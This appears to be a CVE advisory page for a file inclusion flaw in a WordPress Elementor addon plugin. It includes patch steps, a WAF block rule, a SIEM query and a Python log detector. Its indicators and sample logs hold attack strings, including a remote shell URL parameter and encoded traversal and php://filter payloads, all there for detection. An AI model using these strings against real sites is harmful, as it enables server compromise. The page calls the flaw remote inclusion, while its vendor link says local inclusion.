CVE-2025-32158

7.5 HIGH

📋 TL;DR

This vulnerability allows attackers to include arbitrary PHP files from remote servers in the aThemes Addons for Elementor WordPress plugin. Attackers can execute malicious code on affected WordPress sites, potentially taking full control. All WordPress installations using vulnerable versions of this plugin are affected.

💻 Affected Systems

Products:
  • aThemes Addons for Elementor WordPress plugin
Versions: All versions up to and including 1.0.15
Operating Systems: Any OS running WordPress
Default Config Vulnerable: ⚠️ Yes
Notes: Requires WordPress installation with the vulnerable plugin activated.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete server compromise leading to data theft, ransomware deployment, or website defacement through remote code execution.

🟠 Likely Case

Website defacement, data exfiltration, or installation of backdoors for persistent access.

🟢 If Mitigated

Limited impact if proper file permissions, web application firewalls, and input validation are in place.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Remote file inclusion vulnerabilities are commonly exploited and require minimal technical skill.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.0.16 or later

Vendor Advisory: https://patchstack.com/database/wordpress/plugin/athemes-addons-for-elementor-lite/vulnerability/wordpress-athemes-addons-for-elementor-plugin-1-0-15-local-file-inclusion-vulnerability?_s_id=cve

Restart Required: No

Instructions:

1. Log into the WordPress admin panel.
2. Navigate to Plugins > Installed Plugins.
3. Find 'aThemes Addons for Elementor'.
4. Click 'Update Now' if available.
5. If no update appears, manually download version 1.0.16+ from WordPress.org and replace the plugin files.

🔧 Temporary Workarounds

Disable vulnerable plugin (platform: all)

Temporarily deactivate the aThemes Addons for Elementor plugin until patched.

wp plugin deactivate athemes-addons-for-elementor

Web Application Firewall rule (platform: linux)

Block requests containing suspicious file inclusion patterns.

ModSecurity rule: SecRule ARGS "@rx (?:\.\.|php://|http://|ftp://)" "id:1001,phase:2,deny,status:403"

Note that this rule inspects every request argument, so any legitimate parameter that carries a URL or a ".." sequence will also be blocked; scope it to the plugin's request paths if false positives appear.

🧯 If You Can't Patch

  • Remove the plugin entirely and find alternative Elementor addons
  • Implement strict file permissions (755 for directories, 644 for files) and disable allow_url_include in php.ini

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin panel > Plugins > aThemes Addons for Elementor version. If version is 1.0.15 or lower, you are vulnerable.

Check Version:

wp plugin get athemes-addons-for-elementor --field=version

Verify Fix Applied:

Verify plugin version is 1.0.16 or higher in WordPress admin panel.

📡 Detection & Monitoring

Log Indicators:

  • Unusual PHP include/require statements in web server logs
  • Requests with suspicious parameters like ?file=http://malicious.com/shell.php

Network Indicators:

  • Outbound connections to unexpected domains following suspicious requests
  • Unusual file upload patterns

SIEM Query:

source="web_server.log" AND ("include" OR "require") AND ("http://" OR "ftp://" OR "php://")
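As an added example that is not part of the advisory, the following Python detector applies the same patterns as the advisory's WAF rule and SIEM query to constructed web server access-log lines, URL-decoding parameter values first so encoded variants are still caught; it also matches https://, which the advisory's rule does not list. The log lines, IPs and parameter names are constructed for illustration.

```python
"""Flag access-log requests whose query parameters carry file-inclusion
patterns ('..', 'php://', 'http(s)://', 'ftp://'), after URL-decoding."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Patterns from the advisory's WAF rule, plus https://, applied after decoding.
INCLUSION_RE = re.compile(r"(?:\.\.|php://|https?://|ftp://)", re.IGNORECASE)

# Constructed sample lines in Apache combined-log style (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2025:12:00:01 +0000] "GET /wp-content/plugins/athemes-addons-for-elementor/x.php?file=http://example.invalid/shell.txt HTTP/1.1" 200 512
203.0.113.7 - - [10/Apr/2025:12:00:02 +0000] "GET /?p=123 HTTP/1.1" 200 8192
203.0.113.9 - - [10/Apr/2025:12:00:03 +0000] "GET /index.php?template=..%2F..%2Fwp-config.php HTTP/1.1" 200 100
198.51.100.4 - - [10/Apr/2025:12:00:04 +0000] "GET /index.php?page=php%3A%2F%2Ffilter/convert.base64-encode/resource=index HTTP/1.1" 200 100
"""

# Client IP, request line and status code of a combined-log entry.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def decode_fully(value, rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded payloads are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def flag_inclusion_attempts(log_text):
    """Return one hit per suspicious request: source IP, parameter, decoded value, status."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than failing the whole scan
        query = urlsplit(m["target"]).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            decoded = decode_fully(value)  # parse_qsl already decoded once
            if INCLUSION_RE.search(decoded):
                hits.append({"ip": m["ip"], "param": name,
                             "value": decoded, "status": int(m["status"])})
                break  # one record per request is enough for triage
    return hits

if __name__ == "__main__":
    for hit in flag_inclusion_attempts(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 deserves more attention than one answered with 403, since the former reached the application rather than being stopped by the WAF.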

🔗 References
